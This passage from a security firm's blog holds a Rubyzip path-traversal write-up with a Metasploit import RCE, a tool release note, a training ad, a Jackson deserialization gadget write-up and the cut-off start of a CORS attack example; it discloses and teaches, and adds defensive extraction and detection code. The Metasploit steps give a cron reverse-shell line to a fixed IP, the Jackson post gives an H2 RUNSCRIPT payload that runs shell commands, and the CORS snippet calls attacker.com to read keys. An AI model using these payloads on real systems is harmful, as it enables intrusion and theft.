=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>
```

Thanks to the interpretation of the `../` by `Pathname`, the argument to Rubyzip's `Entry#extract` call does not contain any path traversal payloads, which results in a mistakenly supposed "*safe*" path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

## From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and Windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in *production* environments, RoR classes were [cached on first usage](https://guides.rubyonrails.org/autoloading_and_reloading_constants.html#autoload-paths-and-eager-load-paths) via the *cache_classes* directive. During the time allocated for the engagement we didn't find a **reliable** way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger a web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official [documentation](https://guides.rubyonrails.org/v2.3/configuring.html#using-initializers) explains that:

> After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application.
> You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious `.rb` in the `/config/initializers` folder which will be loaded at web server (re)boot.

## Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: [Metasploit Framework](https://www.metasploit.com/)

Going through the source code, we were able to quickly identify several files that use the Rubyzip library to create ZIP files. Since our vulnerability resides in the `extract` function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in the [zip.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/db_manager/import/metasploit_framework/zip.rb) file *(line 157)* that is responsible for importing a Metasploit ZIP file:

```rb
data.entries.each do |e|
  target = ::File.join(@import_filedata[:zip_tmp], e.name)
  data.extract(e, target)
```

As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as `root`, we could easily obtain remote command execution with high privileges using the following steps:

1. Create a file with the following content:
   `* * * * * root /bin/bash -c exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196`
2. Generate the ZIP archive with the path traversal payload:
   `python evilarc.py exploit --os unix -p etc/cron.d/`
3. Add a valid MSF workspace to the ZIP file (in order to have MSF extract it, otherwise it will refuse to process the ZIP archive)
4. Set up two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
5. Log in to the MSF Web Interface
6. Create a new "Project"
7. Select "Import", "From file", choose the evil ZIP file and finally click the "Import" button
8. Wait for the import process to finish
9. Enjoy your reverse shell

[Video: msf-zip-bug.mp4]
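The caller-side check that both the audited application and the Metasploit import code were missing, as an added example (not Rubyzip's, the application's or Metasploit's code): `safe_destination` rejects the absolute-path and `../` entry names used above before `Entry#extract(dest_path)` is ever called, and `FakeEntry` is a constructed, hypothetical stand-in for `Zip::Entry` so the snippet runs without the zip gem.

```ruby
require 'pathname'

# Added example, not Rubyzip's or the audited application's code: the
# destination check a caller must perform itself, because Entry#extract only
# runs name_safe? when it is called WITHOUT a dest_path argument.
#
# Returns the absolute destination path when it stays inside parent_dir,
# or nil when the entry name would escape it (traversal or absolute path).
def safe_destination(parent_dir, entry_name)
  base = Pathname.new(parent_dir).expand_path
  # Pathname#+ returns the right-hand side unchanged when it is absolute,
  # so "/tmp/file.txt" from the evilarc PoC would bypass a naive join.
  return nil if Pathname.new(entry_name).absolute?
  # Pathname#+ also resolves "../" segments (the behaviour shown in the IRB
  # session), so the result has to be compared with the base directory
  # rather than inspected for ".." substrings.
  candidate = (base + entry_name).expand_path
  inside = candidate == base ||
           candidate.to_s.start_with?(base.to_s + File::SEPARATOR)
  inside ? candidate.to_s : nil
end

# Extracts Rubyzip-style entries (anything responding to #name and #extract)
# below parent_dir, skipping every entry whose destination fails the check.
# Returns the list of destination paths that were handed to #extract.
# Directory creation for nested entries is left to the caller.
def extract_entries(entries, parent_dir)
  written = []
  entries.each do |entry|
    dest = safe_destination(parent_dir, entry.name)
    if dest.nil?
      warn "skipped unsafe entry #{entry.name.inspect}"
      next
    end
    entry.extract(dest) # the explicit dest_path form discussed in the article
    written << dest
  end
  written
end

# Constructed stand-in for Zip::Entry (hypothetical, so the example runs
# without the zip gem): it records the destination instead of writing files.
FakeEntry = Struct.new(:name, :sink) do
  def extract(dest_path)
    sink << dest_path
  end
end

# Constructed sample archive mirroring the PoCs in the article: one legitimate
# file plus an absolute-path entry and a "../" traversal entry.
def demo_extraction
  sink = []
  entries = [
    FakeEntry.new('workspace.xml', sink),
    FakeEntry.new('/tmp/file.txt', sink),
    FakeEntry.new('../../etc/cron.d/evil', sink),
  ]
  extract_entries(entries, '/srv/uploads/1234-uuid')
end

if __FILE__ == $PROGRAM_NAME
  puts demo_extraction.inspect # => ["/srv/uploads/1234-uuid/workspace.xml"]
end
```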
## Conclusions

In case you are using `Rubyzip`, check the library usage and perform additional validation against the entry name and the destination path before calling `Entry#extract`.

Here is a small recap of the different scenarios (as of `Rubyzip v1.2.2`):

| Usage | Input by user? | Vulnerable to path traversal? |
|---|---|---|
| entry.extract(path) | yes (path) | **yes** |
| entry.extract(path) | partially (path is concatenated) | **maybe** |
| entry.extract() | partially (entry name) | no |
| entry.extract() | no | no |

If you're using Metasploit, it is [time to patch](https://blog.rapid7.com/2019/04/19/metasploit-wrap-up-13/). We look forward to seeing an msf module for CVE-2019-5624.

## Credits and References

Credit for the research and bugs goes to [email protected] and [email protected].

This work has been performed during a customer engagement and [Doyensec 25% Research Time](https://doyensec.com/research.html). As such, we would like to thank our customer and the Metasploit maintainers for their support.

If you're interested in the topic, take a look at the following resources:

- [Rubyzip Library](https://github.com/Rubyzip/Rubyzip)
- [Ruby on Rails Guides](https://guides.rubyonrails.org/)
- [Attacking Ruby on Rails Applications](http://www.phrack.org/issues/69/12.html)
- [1997 Portable BBS Hacking (or when Zip Slip was actually invented)](http://www.phrack.org/issues/50/3.html)
- [Evilarc blog post (or 2019 and this post is still relevant)](https://labs.neohapsis.com/2009/04/21/directory-traversal-in-archives/)

Electronegativity 1.3.0 released!

10 June 2019 at 22:00
After the first public release of [Electronegativity](https://github.com/doyensec/electronegativity), we had a great response from the community and the tool quickly became the baseline for every Electron app's security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. **Today we are proud to release [version 1.3.0](https://github.com/doyensec/electronegativity/releases/tag/v1.3.0) with many new improvements and security checks for your Electron applications.**

[Video: electronegativity-1-3.mp4]

We're also excited to announce that **the tool has been accepted for [Black Hat USA Arsenal 2019](https://www.blackhat.com/us-19/arsenal/schedule/#electronegativity-identify-misconfigurations-and-security-anti-patterns-in-electron-applications-15485)**, where it will be showcased at the Mandalay Bay in Las Vegas. We'll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you're simply interested in trying out what's new in Electronegativity, go ahead and update or install it using NPM:

```bash
$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g
```

To review your application, use the following command:

```bash
$ electronegativity -i /path/to/electron/app
```

## What's New

Electronegativity 1.1.1 initially shipped with [27 unique checks](https://blog.doyensec.com/2019/01/24/electronegativity.html). Now it counts over [40 checks](https://github.com/doyensec/electronegativity/wiki#electronegativity-checks), featuring a new advanced check system to help improve the tool's detection capabilities in sorting out false positive and false negative findings. Here is a brief list of what's new in this 1.3.0 release:

- Every check now has an importance and an accuracy attribute, which helps the auditor determine the importance of each finding. Consequently, we also introduced new command line flags to filter the results by severity (`--severity`) and by confidence (`--confidence`), useful for tailored Electronegativity integration in your application security pipelines or build systems.
- We introduced a new class of checks called *GlobalChecks* which can dynamically set the *severity* and *confidence* of the findings, or create new ones, considering the inherent security risk posed by their interaction (e.g. cross-checking the `nodeIntegration` and `sandbox` flag values, or the presence of the `affinity` flag used across different windows).
- Variable scoping analysis capabilities have been added to inspect the *Function* and *Global* variable content, when available.
- A new single-check scan mode is now provided by passing the `-l` flag along with a list of enabled checks (e.g. `-l AuxClickJsCheck,AuxClickHtmlCheck`). Another command line flag has been introduced to show relative paths for files (`-r`).
- The newly introduced Electron component *[BrowserView](https://electronjs.org/docs/api/browser-view)* is now supported, which is meant to be an alternative to the *[WebView](https://electronjs.org/docs/api/webview-tag)* tag. The tool now also detects the use of the `nodeIntegrationInSubFrames` experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a `webview` object).
- Various bug fixes and new checks! (see below)

### Updated Checks

This new release also comes with new and updated checks. As always, a knowledge base containing information about risk and auditing strategy has been created for each class of vulnerabilities.

#### Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Because the renderer process is reused, certain `webPreferences` options will also be shared between the web pages even when you specified different values for them. This can lead to unexpected security configuration overrides:

![Affinity Property Vulnerability](../../../public/images/electron-affinity.png)

In the above [demo](https://gist.github.com/0d928ee9ed95519859dda9dc7ffc1060), the `affinity` set between the two `BrowserWindow` objects will cause unwanted sharing of the `nodeIntegration` property value. Electronegativity will now issue a finding reporting the usage of this flag if present.

*Read more on the dedicated [AFFINITY_GLOBAL_CHECK](https://github.com/doyensec/electronegativity/wiki/AFFINITY_GLOBAL_CHECK) wiki page.*

#### AllowPopups Check

When the `allowpopups` attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

*Read more on the [ALLOWPOPUPS_HTML_CHECK](https://github.com/doyensec/electronegativity/wiki/ALLOWPOPUPS_HTML_CHECK) wiki page.*

#### Missing Electron Security Patches Detection

This check detects if there are security patches available for the Electron version used by the target application.
From this release we switched from manually updating a safe-releases file to a routine which automatically fetches the latest releases from Electron's official repository and determines at each run whether security patches are available.

*Read more on the [AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK](https://github.com/doyensec/electronegativity/wiki/AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK) and [ELECTRON_VERSION_JSON_CHECK](https://github.com/doyensec/electronegativity/wiki/ELECTRON_VERSION_JSON_CHECK) wiki pages.*

#### Check for Custom Command Line Arguments

This check compares the custom command line arguments set in the *package.json* `scripts` and `configuration` objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

*Read more on the [CUSTOM_ARGUMENTS_JSON_CHECK](https://github.com/doyensec/electronegativity/wiki/CUSTOM_ARGUMENTS_JSON_CHECK) wiki page.*

#### CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site scripting attacks and data injection attacks. If a CSP is detected, it will look for weak directives by using a [new library](https://www.npmjs.com/package/@doyensec/csp-evaluator) based on the [csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com/) online tool.

*Read more on the [CSP_GLOBAL_CHECK](https://github.com/doyensec/electronegativity/wiki/CSP_GLOBAL_CHECK) wiki page.*

#### Dangerous JS Functions called with user-supplied data

Looks for occurrences of `insertCSS`, `executeJavaScript`, `eval`, `Function`, `setTimeout`, `setInterval` and `setImmediate` with user-supplied input.

*Read more on the [DANGEROUS_FUNCTIONS_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/DANGEROUS_FUNCTIONS_JS_CHECK) wiki page.*

#### Check for mitigations set to limit the navigation flows

Detects if the `on()` handler for the `will-navigate` and `new-window` events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under full control of remote origins in case of accidental navigation.

*Read more on the [LIMIT_NAVIGATION_GLOBAL_CHECK](https://github.com/doyensec/electronegativity/wiki/LIMIT_NAVIGATION_GLOBAL_CHECK) and [LIMIT_NAVIGATION_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/LIMIT_NAVIGATION_JS_CHECK) wiki pages.*

#### Detects if Electron's security warnings have been disabled

The tool will check if Electron's warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling these warnings may hide the presence of misconfigurations or insecure patterns from the developers.

*Read more on the [SECURITY_WARNINGS_DISABLED_JS_CHECK](https://github.com/doyensec/electronegativity/wiki/SECURITY_WARNINGS_DISABLED_JS_CHECK) and [SECURITY_WARNINGS_DISABLED_JSON_CHECK](https://github.com/doyensec/electronegativity/wiki/SECURITY_WARNINGS_DISABLED_JSON_CHECK) wiki pages.*

#### Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a `setPermissionRequestHandler` has been set.

*Read more on the [PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK](https://github.com/doyensec/electronegativity/wiki/PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK) wiki page.*

...and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind it, and that creating the right and robust tools to help this community is the first step towards improving the security stance of the whole Electron ecosystem.

As a final remark, we'd like to thank all past and present contributors to this tool: [email protected], [email protected], [email protected], [email protected], [email protected], and ultimately [email protected] for sponsoring this release.

See you in Vegas!

Electron Security Workshop

2 July 2019 at 22:00
## 2-Day Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-day workshop.

![ElectronJS Logo](../../../public/images/electronlogo.png)

With the increasing popularity of the [ElectronJs Framework](https://electronjs.org/), we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise defense-in-depth mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface. We will analyze the common root causes of misconfigurations and vulnerabilities. The class will be centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, *nodeIntegration* and *sandbox* bypasses, insecure *preload* bugs, prototype pollution attacks, *affinity* abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.

If you're interested, check out this short teaser:

[Video: https://www.youtube.com/embed/oTJOE6LOPks]

### Audience Profile

Who should take this course?

- JavaScript and Node.js Developers
- Security Engineers
- Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and a basic understanding of web application security (e.g. XSS) are required.

### General Information

Attendees will receive a bundle with all material, including:

- Workshop presentation (over 200 slides)
- Code, exploits and artifacts of all exercises
- Certificate of completion

This 2-day training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We're a flexible security boutique and can further customize the agenda to your specific company's needs.

**Feel free to contact us at [email protected] for scheduling your class!**

Jackson gadgets - Anatomy of a vulnerability

21 July 2019 at 22:00
Jackson CVE-2019-12384: anatomy of a vulnerability class

During one of our engagements, we analyzed an application which used the Jackson library (https://github.com/FasterXML/jackson) for deserializing JSON. In that context, we identified a deserialization vulnerability where we could control the class to be deserialized. In this article, we want to show how an attacker may leverage this deserialization vulnerability to trigger attacks such as Server-Side Request Forgery (SSRF) and remote code execution.

This research also resulted in a new CVE, CVE-2019-12384 (https://access.redhat.com/security/cve/cve-2019-12384), and a number of RedHat products affected by it:

[Image: Vulnerability Impact]

What is required?

As reported by Jackson's author in "On Jackson CVEs: Don't Panic — Here is what you need to know" (https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96), the requirements for a Jackson "gadget" vulnerability are:

(1) The application accepts JSON content sent by an untrusted client (composed either manually or by code you did not write and have no visibility or control over), meaning that you cannot constrain the JSON itself that is being sent.

(2) The application uses polymorphic type handling for properties with a nominal type of java.lang.Object (or one of a small number of "permissive" tag interfaces such as java.util.Serializable or java.util.Comparable).

(3) The application has at least one specific "gadget" class to exploit in the Java classpath. In detail, exploitation requires a class that works with Jackson. In fact, most gadgets only work with specific libraries, e.g. the most commonly reported ones work with JDK serialization.

(4) The application uses a version of Jackson that does not (yet) block the specific "gadget" class. There is a set of published gadgets which grows over time, so it is a race between people finding and reporting gadgets and the patches. Jackson operates on a blacklist. The deserialization is a "feature" of the platform and they continually update a blacklist of known gadgets that people report (https://github.com/FasterXML/jackson-databind/blob/master/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java).

In this research we assumed that preconditions (1) and (2) are satisfied. Instead, we concentrated on finding a gadget that meets both (3) and (4). Please note that Jackson is one of the most used deserialization frameworks for Java applications where polymorphism is a first-class concept. Finding these conditions comes at zero cost to a potential attacker, who may use static analysis tools (https://find-sec-bugs.github.io/bugs.htm#JACKSON_UNSAFE_DESERIALIZATION) or dynamic techniques, such as grepping for `[email protected]` in requests/responses, to find these targets.

Preparing for the battlefield

During our research we developed a tool to assist in the discovery of such vulnerabilities. When Jackson deserializes `ch.qos.logback.core.db.DriverManagerConnectionSource`, this class can be abused to instantiate a JDBC connection. JDBC stands for (J)ava (D)ata(b)ase (C)onnectivity: it is a Java API to connect to a database and execute queries against it, and it is part of Java SE (Java Standard Edition). Moreover, JDBC uses an automatic string-to-class mapping, which makes it a perfect target to load and execute even more "gadgets" inside the chain.

To demonstrate the attack, we prepared a wrapper in which we load arbitrary polymorphic classes specified by an attacker. For the environment we used jRuby (https://www.jruby.org/), a Ruby implementation running on top of the Java Virtual Machine (JVM). Thanks to its integration with the JVM, we can easily load and instantiate Java classes.

We use this setup to load the Java classes found in a given directory and to prepare the Jackson environment so that it meets the first two requirements (1, 2) listed above. The following jRuby script does that (the line numbers referenced below count from `require 'java'` as line 1):

```ruby
require 'java'
Dir["./classpath/*.jar"].each do |f|
	require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)
```

The script proceeds as follows:

- At line 2, it loads all of the classes contained in the Java Archives (JARs) within the "classpath" subdirectory
- Between lines 5 and 13, it configures Jackson in order to meet requirement (2)
- Between lines 14 and 17, it deserializes and serializes a polymorphic Jackson object passed to jRuby as JSON

Memento: reaching the gadget

For this research we decided to use gadgets that are widely used by the Java community. All the libraries targeted to demonstrate this attack are in the top 100 most common libraries in the Maven Central repository (https://search.maven.org/).

To follow along and prepare for the attack, you can download the following libraries and put them in the "classpath" directory:

- jackson-databind-2.9.8 (http://central.maven.org/maven2/com/fasterxml/jackson/core/jackson-databind/2.9.8/jackson-databind-2.9.8.jar)
- jackson-annotations-2.9.8 (http://central.maven.org/maven2/com/fasterxml/jackson/core/jackson-annotations/2.9.8/jackson-annotations-2.9.8.jar)
- jackson-core-2.9.8 (http://central.maven.org/maven2/com/fasterxml/jackson/core/jackson-core/2.9.8/jackson-core-2.9.8.jar)
- logback-core-1.3.0-alpha4 (http://central.maven.org/maven2/ch/qos/logback/logback-core/1.3.0-alpha4/logback-core-1.3.0-alpha4.jar)
- h2-1.4.199 (http://central.maven.org/maven2/com/h2database/h2/1.4.199/h2-1.4.199.jar)

It should be noted that the `h2` library is not required to perform SSRF, since our experience suggests that most Java applications load at least one JDBC driver. JDBC drivers are classes that are automatically instantiated when a JDBC URL is passed in, with the full URL passed to them as an argument.

Using the following command, we call the previous script with the aforementioned classpath:

```bash
$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]"
```

On line 15 of the script, Jackson recursively calls all of the setters with the keys contained inside the sub-object. More specifically, `setUrl(String url)` is called with our arguments by the Jackson reflection library. After that phase (line 17) the full object is serialized into a JSON object again. At this point all the fields are serialized, either directly if no getter is defined, or through an explicit getter. The interesting getter for us is `getConnection()`. In fact, as an attacker, we are interested in all "non-pure" methods (http://tutorials.jenkov.com/java-functional-programming/index.html#pure-functions) that have interesting side effects where we control an argument.

When `getConnection` is called, an in-memory database is instantiated. Since the application is short-lived, we won't see any meaningful effect from the attacker's perspective. To do something more meaningful we create a connection to a remote database. If the target application is deployed as a remote service, an attacker can generate a Server-Side Request Forgery (SSRF). The following screenshot is an example of this scenario.

[Image: Jackson Chain]

Enter the Matrix: From SSRF to RCE

As you may have noticed, both of these scenarios lead to DoS and SSRF. While those attacks may affect the application's security, we want to show you a simple and effective technique to turn an SSRF into a full-chain RCE.

To gain full code execution in the context of the application, we employed the capability of loading the H2 (http://www.h2database.com/html/features.html) JDBC driver. H2 is a very fast SQL database usually employed as an in-memory replacement for full-fledged SQL database management systems (such as PostgreSQL, MSSQL, MySQL or Oracle DB). It is easily configurable and supports many modes such as in-memory, on file, and on remote servers. H2 has the capability to run SQL scripts from the JDBC URL, which was added in order to have an in-memory database that supports init migrations (https://edgeguides.rubyonrails.org/active_record_migrations.html). This alone won't allow an attacker to actually execute Java code inside the JVM context. However, since H2 is implemented inside the JVM, it has the capability to specify custom aliases containing Java code (https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html). This is what we can abuse to execute arbitrary code.

We can easily serve the following `inject.sql` INIT file through a simple HTTP server such as Python's (e.g. `python -m SimpleHTTPServer`):

```sql
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}
$$;
CALL SHELLEXEC('id > exploited.txt')
```

And run the tester application with:

```bash
$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"
...
$ cat exploited.txt
uid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),501(access_bpf),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)
```

Voilà!

Iterative Taint-Tracking

Exploitation of deserialization vulnerabilities is complex and takes time. When conducting a product security review, time constraints can make it difficult to find the appropriate gadgets to use in exploitation. On the other hand, the Jackson blacklists are updated on a monthly basis, while users of this mechanism (e.g. enterprise applications) may have yearly release cycles.

Deserialization vulnerabilities are the typical needle-in-the-haystack problem. On the one hand, identifying a vulnerable entry point is an easy task, while finding a useful gadget may be time-consuming (and tedious). At Doyensec we developed a technique to find useful Jackson gadgets to facilitate the latter effort. We built a static analysis tool that can find serialization gadgets through taint-tracking analysis (https://en.wikipedia.org/wiki/Taint_checking). We designed it to be fast enough to run multiple times and to iterate and improve through a custom and extensible rule-set language. On average a run on a MacBook Pro i7 2018 takes 2 minutes.

[Image: Jackson Taint Tracking]

Taint-tracking is a topical academic research subject. Academic research tools focus on very high recall and precision; the trade-off lies between high recall/precision and speed/memory. Since we wanted this tool to be usable while testing commercial-grade products, and we valued the customizability of the tool itself, we focused on speed and usability instead of high recall. While the tool is inspired by other research such as FlowDroid (https://blogs.uni-paderborn.de/sse/tools/flowdroid/), the focus of our technique is not to rule out the human analyst. Instead, we believe in augmenting manual testing and exploitation with customizable security automation (https://doyensec.com/automation.html).

This research was possible thanks to the 25% research time (https://doyensec.com/careers.html) at Doyensec. Tune in again for new episodes.

That's all folks! Keep it up and be safe!
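The write-up above is about finding gadgets; on the defending side, the two preconditions it lists (untrusted JSON reaching a mapper with default typing) leave a recognizable trace in traffic. The script below is an added example, not Doyensec's tool and not Jackson's own validator: it walks JSON request bodies looking for the polymorphic type hints that `enableDefaultTyping()` produces (the `["fully.qualified.Class", {...}]` array form, and the `@class` property used by Jackson's property-based inclusion) and flags the logback class and the H2 `INIT=RUNSCRIPT` JDBC URL from the chain described above. The sample bodies are constructed, and the class list is illustrative rather than a replacement for Jackson's blacklist.

```python
"""Flag Jackson default-typing payloads in JSON request bodies.

Added example for this post (not Doyensec's or Jackson's code). Jackson's
default typing encodes a polymorphic value either as a two-element array
["fully.qualified.Class", {...}] or, with property-based inclusion, as an
object carrying an "@class" key. Both shapes are easy to spot in gateway
or WAF logs, so a defender can see precondition (2) being exercised long
before anyone finds a gadget. All sample payloads below are constructed.
"""
import json
import re

# Class names and URL fragments taken from the write-up above. Illustrative
# only: Jackson's SubTypeValidator blacklist is the authoritative list.
SUSPICIOUS_CLASSES = {
    "ch.qos.logback.core.db.DriverManagerConnectionSource",
}
JDBC_URL_RE = re.compile(r"jdbc:[a-z0-9]+:", re.IGNORECASE)
H2_INIT_RE = re.compile(r"INIT\s*=\s*RUNSCRIPT", re.IGNORECASE)

# A dotted Java class name: at least one package segment plus the class
_CLASS_NAME_RE = re.compile(r"^[a-zA-Z_$][\w$]*(\.[a-zA-Z_$][\w$]*)+$")


def _walk(node, findings, path="$"):
    """Recursively visit a parsed JSON value, recording type hints and JDBC URLs."""
    if isinstance(node, list):
        # Array form of a polymorphic value: [class name, properties object]
        if (len(node) == 2 and isinstance(node[0], str)
                and _CLASS_NAME_RE.match(node[0]) and isinstance(node[1], dict)):
            findings.append(("type_hint", path, node[0]))
        for i, item in enumerate(node):
            _walk(item, findings, f"{path}[{i}]")
    elif isinstance(node, dict):
        # Property form of a polymorphic value: {"@class": "...", ...}
        if isinstance(node.get("@class"), str):
            findings.append(("type_hint", path, node["@class"]))
        for key, value in node.items():
            _walk(value, findings, f"{path}.{key}")
    elif isinstance(node, str):
        if JDBC_URL_RE.search(node):
            kind = "jdbc_url_with_init" if H2_INIT_RE.search(node) else "jdbc_url"
            findings.append((kind, path, node))


def scan_body(body: str):
    """Return a list of (kind, json_path, value) findings for one request body.

    Kinds: type_hint, blocked_class (a type hint naming a class from
    SUSPICIOUS_CLASSES), jdbc_url, jdbc_url_with_init. Bodies that are not
    valid JSON yield no findings.
    """
    try:
        parsed = json.loads(body)
    except ValueError:
        return []
    findings = []
    _walk(parsed, findings)
    return [
        ("blocked_class", p, v) if k == "type_hint" and v in SUSPICIOUS_CLASSES else (k, p, v)
        for k, p, v in findings
    ]


def severity(body: str) -> str:
    """Collapse findings to a triage label: 'critical', 'suspicious' or 'clean'."""
    kinds = {k for k, _, _ in scan_body(body)}
    if "blocked_class" in kinds or "jdbc_url_with_init" in kinds:
        return "critical"
    if kinds:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    # Constructed sample bodies: a benign order, the SSRF payload shape from
    # the post, and the H2 INIT variant. None of these are captured traffic.
    samples = [
        '{"item": "book", "qty": 2}',
        '["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url": "jdbc:h2:mem:"}]',
        '{"conn": {"@class": "some.other.Bean", "url": "jdbc:h2:mem:;INIT=RUNSCRIPT FROM \'http://example.invalid/x.sql\'"}}',
    ]
    for body in samples:
        print(severity(body), scan_body(body))
```

Run as-is it triages the three constructed samples; in practice you would feed it bodies from an API gateway or WAF log. A `suspicious` result means an externally supplied type hint reached the parser, which is precondition (2) above being exercised whether or not a gadget is on the classpath; `critical` means the specific chain from this post (or any JDBC URL carrying an H2 `INIT` script) was observed.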

Lessons in auditing cryptocurrency wallets, systems, and infrastructures

31 July 2019 at 22:00
In the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchange web interfaces, custody systems, and backbone infrastructure components.

We have seen many things done right, but also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to creating better systems.

[Image: Doyensec cryptocurrency security]

In this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities.

> Breaking Crypto Currency Systems != Breaking Crypto (at least not always)
>
> For that, you would probably need to wait for Jean-Philippe Aumasson's talk (https://www.blackhat.com/us-19/briefings/schedule/#lessons-from-two-years-of-crypto-audits-14738) at the upcoming BlackHat Vegas.

This blog post was brought to you by Kevin Joensen (https://twitter.com/ggisx) and Mateusz Swidniak.

1) CORS Misconfigurations

Cross-Origin Resource Sharing (https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) is used for relaxing the Same-Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS policy can have a great impact on a website's security posture, as other sites might access the page content.

Imagine a website with the following HTTP response headers:

```http
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
```

If an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a null origin using an iframe tag with a sandbox attribute:

```html
<iframe sandbox="allow-scripts" src="https://attacker.com/corsbug" />
```

```html
<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = callback;
req.open('GET', 'https://bitcoinbank/keys', true);
req.withCredentials = true;
req.send();
function callback() {
